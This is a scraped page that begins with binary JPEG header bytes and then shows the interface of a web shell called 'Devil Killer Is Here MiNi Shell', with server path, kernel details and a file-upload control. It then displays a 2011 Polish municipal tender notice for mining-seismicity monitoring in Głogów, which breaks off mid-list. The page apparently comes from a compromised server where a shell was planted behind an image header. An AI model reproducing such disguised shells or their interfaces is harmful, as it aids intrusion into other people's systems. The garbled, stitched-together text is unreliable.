JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110315/44680-N-2011.html

<p class="kh_header"><b>Głogów: WYKONANIE MONITORINGU ODDZIAŁYWANIA GÓRNICTWA MIEDZIOWEGO NA MIASTO GŁOGÓW</b><br>
<b>Numer ogłoszenia: 44680 - 2011; data zamieszczenia: 15.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE MONITORINGU ODDZIAŁYWANIA GÓRNICTWA MIEDZIOWEGO NA MIASTO GŁOGÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 2 części:
I.	Część pierwsza zamówienia obejmuje wykonanie niezależnego systemu monitorowania wstrząsów górniczych generowanych eksploatacją złoża rud miedzi w kopalniach LGOM, a w szczególności eksploatacją złoża w najbliższej przyszłości w północno - zachodnich częściach obszarów górniczych Rudna I i Sieroszowice I i w nowym obszarze koncesyjnym Głogów Głęboki -Przemysłowy oraz w dalszej perspektywie, w granicach obszaru dokumentacyjnego Głogów. System oparty będzie na 3 stanowiskach pomiarowych zlokalizowanych na terenie osiedli: im. Kopernika, im. Piastów Śląskich i na terenie Starego Miasta (budynek ratusza), wg poniższych założeń:
1)	zastosowanie typowych urządzeń aparatury, kompatybilnych w stosunku do aparatury stosowanej w górnictwie; 
2)	zaprojektowanie systemu typu otwartego tj. systemu otwartego na możliwości wprowadzenia zmian i ilości stanowisk pomiarowych i ich wyposażenia; 
3)	zastosowanie bezprzewodowej transmisji danych ze stanowisk pomiarowych do punktu dyspozytorskiego; 
4)	organizacja punktu dyspozytorskiego w budynku Urzędu Miejskiego w Głogowie; 
5)	wybór lokalizacji punktów pomiarowych w części miasta o intensywnej zabudowie; 
6)	zlokalizować punkty pomiarowe możliwie w obiektach komunalnych lub użyteczności publicznej; 
7)	przy lokalizacji stanowisk pomiarowych należy kierować się warunkami zapewniającymi prawidłowość pracy, bezpieczeństwem zainstalowanych urządzeń, dostępnością energii elektrycznej do ich zasilania, dogodną transmisją danych drogą radiową; 
8)	zastosowanie rozwiązań angażujących minimalne koszty, możliwie najkrótszy okres realizacji i niezawodność funkcjonowania monitoringu;
Należy zastosować wielokanałowy rejestrator do rejestracji wstrząsów w formie sejsmogramów prędkości drgaqń (trzy składowe) oraz przyspieszenia drgań (trzy składowe) z oprogramowaniem do wizualizacji przebiegów i ich analizą w skali GSI-2004 oraz możliwością transmisji komórkowej danych do punktu dyspozytorskiego. Czas trwania rejestrowanych drgań dla wstrząsów nie może być mniejszy niż 15 s. Należy zapewnić rejestracji amplitud prędkości drgań do 0,2 ms w całym paśmie od 0,5 do 40 Hz oraz możliwość rejestracji amplitud przyspieszenia drgań do 3 m/s2 w całym paśmie od 0,5 do 40 Hz. Minimalne próbkowanie - 100 prs. Charakterystyka amplitudowo - częstotliwościowa kanału sejsmicznego prostoliniowa w zakresie od 0,5 do 40 Hz. Synchronizacja czasu zapisu wstrząsów zgodna z czasem GPS. 
Punkt dyspozytorski - Przenośna stacja odbiorcza oparta o notebook z oprogramowaniem do czytania danych i analizy sygnałów z rejestratora wielokanałowego. Centralna stacja odbiorcza w biurze z oprogramowaniem do pobierania wstrząsów przesyłanych transmisją komórkową z rejestratorów zewnętrznych z podstawowym oprogramowaniem do analizy zarejestrowanych wstrząsów (tzn. filtracja przebiegów czasowych, korekta linii bazowej, całkowanie i różniczkowanie przebiegów czasowych, eksport i import wstrząsów w plikach ASCII i analiza częstotliwościowa FFT) z oprogramowaniem do analizy wstrząsów w skali GSI-2004 oraz oprogramowaniem do wykonywania raportów w skali GSI-2004. 
Należy wykonać projekt powykonawczy stanowisk pomiarowych w terenie i stacji odbiorczej w punkcie dyspozytorskim. Należy przewidzieć zakup 2 szafek do montażu stanowisk w terenie, załączyć charakterystyki kalibracyjne wszystkich kanałów sejsmicznych. 
Należy przewidzieć gotowość przygotowania plików z bazy zarejestrowanych wstrząsów w formacie kompatybilnym do pobierania danych przez stronę internetową o sejsmiczności w mieście. 
Ogólny schemat systemu pomiarowego
System pomiarowy obejmuje następujące podstawowe elementy:
-	aparatura rejestrująca drgania wywoływane przez wstrząsy górnicze, 
-	układ transmisji sygnałów sejsmicznych, 
-	mierniki drgań, 
-	punkt dyspozytorski, 
-	oprogramowanie do rejestracji, wizualizacji, analizy i prowadzenia bazy danych oraz przygotowania raportów o zarejestrowanych wstrząsach i innych drganiach parasejsmicznych. 
Zapewnienie sprzętu i oprogramowania do rejestracji, obróbki i archiwizacji danych, szkolenie personelu obsługującego, zapewnienie serwisu w pierwszym roku funkcjonowania. Należy zapewnić serwis pogwarancyjny. 
Projekt monitoringu z opisem lokalizacji założeń i wyposażenia stanowi załącznik do niniejszej specyfikacji. 

Część II zamówienia obejmuje wytyczenie miejsca wiercenia otworów i wykonanie otworów. Następnie wykonane będą prace wiertnicze:
- otwór Gm-1 około 10,5 m;
- otwór Gm-2 około 11,5 m;
- otwór Gm-3 około 6,5 m;
- otwór Gm-4 około 6,0 m.
Łączny metraż robót wiertniczych: 34,5 m.
Ostateczna głębokość każdego z otworów piezometrycznych będzie uzależniona od napotkanych warunków litologicznych. W związku z tym głębokość poszczególnych otworów może być mniejsza lub większa, stosownie do głębokości zalegania warstwy wodonośnej zakwalifikowanej przez dozór geologiczny do zainstalowania piezometru. W przypadku nie stwierdzenia w otworze warstwy wodonośnej do głębokości 6-12 m, otwór należy zlikwidować wydobytym urobkiem i w porozumieniu ze Zleceniodawcą i Użytkownikiem terenu ewentualnie wytyczyć nową lokalizację danego otworu z dodatkiem do numeru litery a. Przyjmuje się rezerwę dodatkowego metrażu wiercenia w wysokości 50%, tj. 17,25 m, z uwagi na możliwość wystąpienia konieczności przestawienia otworu (trudne do przewidzenia warunki geologiczne napotkane głazy, brak warstwy wodonośnej).
Przewiduje się odwiercenie otworów piezometrycznych metodą obrotową na sucho, samojezdnym aparatem wiertniczym typu ŁBU 50.
Konstrukcja projektowanych otworów
Projektuje się wykonanie otworów piezometrycznych przy zastosowaniu
następujących operacji technologicznych:
a)	wiercenie pod rury okładzinowe, 
b)	po zapuszczeniu kolumny rur wykonanie 0,5 m zagęszczonej poduszki żwirowej pod kolumnę filtracyjną; 
c)	centryczne (z zastosowaniem prowadników) opuszczenie do otworu kolumny piezometrycznej 
d)	wykonanie obsypki żwirowej,
e)	wykonanie obsypki izolacyjnej w interwale 
f)	wykonanie obudowy piezometru na powierzchni w postaci studzienki betonowej zamykanej płytą żelbetową, 
g)	wykonanie na obudowie trwałego oznakowania otworu.
Zamykanie horyzontów wodonośnych - W przypadku stwierdzenia w pierwszej napotkanej warstwie wodonośnej słabego zawodnienia lub wody zawieszonej, wiercenie będzie kontynuowane do górnej głównej warstwy czwartorzędowego piętra wodonośnego. Po jej nawierceniu będzie dokonany pomiar lustra wody nawierconego i statycznego. Po odwierceniu otworu, w czasie wyciągania kolumny rur okładzinowych, przypowierzchniowy odcinek obsypki zostanie wykonany z materiału izolacyjnego - glina, pył lub bentonit. Zapewni to zabezpieczenie ujmowanej warstwy wodonośnej przed migracją ewentualnych zanieczyszczeń z powierzchni terenu.
W trakcie wiercenia i po zafiltrowaniu otworu należy wykonać pomiar zwierciadła wody nawiercony i ustabilizowany, za pomocą sondy akustycznej lub elektrycznej.
Miejsce wiercenia otworu wytyczy nadzór geologiczny. Po wykonaniu wiercenia i obudowy geodeta wyznaczy współrzędne otworu i charakterystyczną rzędną obudowy piezometru.
Zapewnienie oprogramowania do rejestracji i archiwizacji danych, szkolenie personelu obsługującego, zapewnienie serwisu w pierwszym roku funkcjonowania.

Uwaga:
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja techniczna stanowiąca załącznik do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>-powtórzenie tego samego rodzaju zamówień, zgodnie z przedmiotem zamówienia stanowiących nie więcej niż 50 procent wartości zamówienia podstawowego 
-rozszerzenie dostawy ,jeśli zmiana wykonawcy powodowałaby konieczność nabywania rzeczy o innych parametrach technicznych co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne w użytkowaniu i dozorze , stanowiących nie więcej niż 20 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.54.00.00-2, 71.35.21.20-7, 71.35.21.30-0, 71.35.21.40-3, 90.71.15.00-9, 76.43.13.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> część I 3000 zł
część II nie wymaga się wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>część I - posiadają status zakładu górniczego z kierownikiem ruchu zakładu
częśc II - nie dotyczy
Ocena spełnienia warunku odbędzie sie na podstawie świadectwa kierownika ruchu zakładu górniczego wystawionego przez właściwy     Okręgowy urząd Górniczy - dla części I na zasadzie spelnia -nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą się ubiegać wykonawcy, którzy wykażą i udokumentują, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy               i doświadczenia, przez co należy rozumieć:
-	część I - wykonanie co najmniej jednej dostawy specjalistycznej zrealizowanej dla terenów górniczych i na kwotę co najmniej 100.000 zł. brutto. 
-	Zamawiający za dostawę specjalistyczną uzna realizację systemu z zakresu monitoringu środowiska w obszarach górniczych obejmującą wykonanie systemu: obserwacji wstrząsów górniczych na zabudowę oraz infrastrukturę techniczną, obserwacji deformacji powierzchni terenu na zabudowę oraz infrastrukturę techniczną, obserwacji wstrząsów górniczych i wielkopowierzchniowych deformacji powierzchni terenu na środowisko przyrodnicze, opracowania dotyczące ramowego programu kompleksowego monitoringu wpływów bezpośrednich i pośrednich eksploatacji złóż w zakresie: monitoringu geodezyjnego, monitoringu sejsmicznego, monitoringu środowiskowego; opracowań ramowego programu działań zapobiegawczo - profilaktycznych dla ochrony obiektów budowlanych, infrastruktury technicznej lub wykonanie projektu monitoringu
-	część II - wykonanie co najmniej jednej usługi  specjalistycznej zrealizowanej dla terenów górniczych na kwotę co najmniej 30.000 zł.brutto.
-	Zamawiający za usługę specjalistyczną uzna wykonanie projektu lub wykonaną realizację z zakresu monitoringu osiadań powierzchni terenu na zmianę położenia wód gruntowych i cieków powierzchniowych, monitoringu hydrogeologicznego, monitoringu hydrologicznego, 
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu usług lub dostaw i dokumentów potwierdzających ,że usługi, dostawy zostały wykonane należycie , na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnienie warunku zostanie ocenione na podstawie złożonego oświadczenia na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą się ubiegać wykonawcy, którzy a)	dysponują osobami zdolnymi do wykonania zamówienia tj.: 
część I :
-	kierownik ruchu zakładu będzie osobą pełniącą funkcję kierownika zespołu projektowego
-	osoby  legitymujące się państwowymi uprawnieniami geologa górniczego, geologiczno - inżynierskimi, uprawnieniami mierniczego górniczego, 
-	osoby posiadające uprawnienia z zakresu budownictwa na terenach górniczych (z  
     uprawnieniami budowlanymi w tym zakresie lub z uprawnieniami rzeczoznawcy).
część II :
- osoby legitymujące się państwowymi uprawnieniami geologa górniczego, hydrogeologa, geologiczno - inżynierskimi,  
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu osób ,które będą odpowiedzialne za realizację zamówienia oraz oświadczenia ,że osoby te posiadają wymagane uprawnienia na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą się ubiegać wykonawcy,którzy a)	część I i II - posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej;
Ocena spełnienia warunku będzie dokonana na podstawie dokumentu potwierdzającego ,że wykonawca jest ubezpieczony od OC ,dowodu jego opłacenia na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Wypełniony  załącznik nr 1 - formularz OFERTA .
2)Pełnomocnictwo podmiotów występujących wspólnie
3)Pełnomocnictwo dla osoby podpisującej ofertę i oświadczenia - jeśli uprawnienie tej osoby nie wynika z innych dokumentów dołączonych do oferty
4)Harmonogram rzeczowo - finansowy w układzie miesięcznym. Na etapie zawierania umowy Zamawiający zastrzega sobie możliwość dokonania aktualizacji harmonogramu rzeczowo-finansowego.
5)Kalkulacja ceny
6)Kopia dowodu wniesienia wadium. 
7)Wykaz części zamówienia, które wykonawca zamierza zlecić do wykonania podwykonawcom.
8)Zobowiązania innych podmiotów
9)Świadectwo kierownika ruchu zakładu górniczego wystawionego przez właściwy     Okręgowy urząd Górniczy - dla części I.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>7.	Zmiany umowy:
7.1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
7.2. Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
7.3. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach :
1)	Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2)	Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
3)	Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty,
4)	Za kluczowego specjalistę uważa się kierownika budowy i kierowników robót branżowych.
7.4. Zmiany w umowie będą mogły nastąpić w następujących przypadkach:
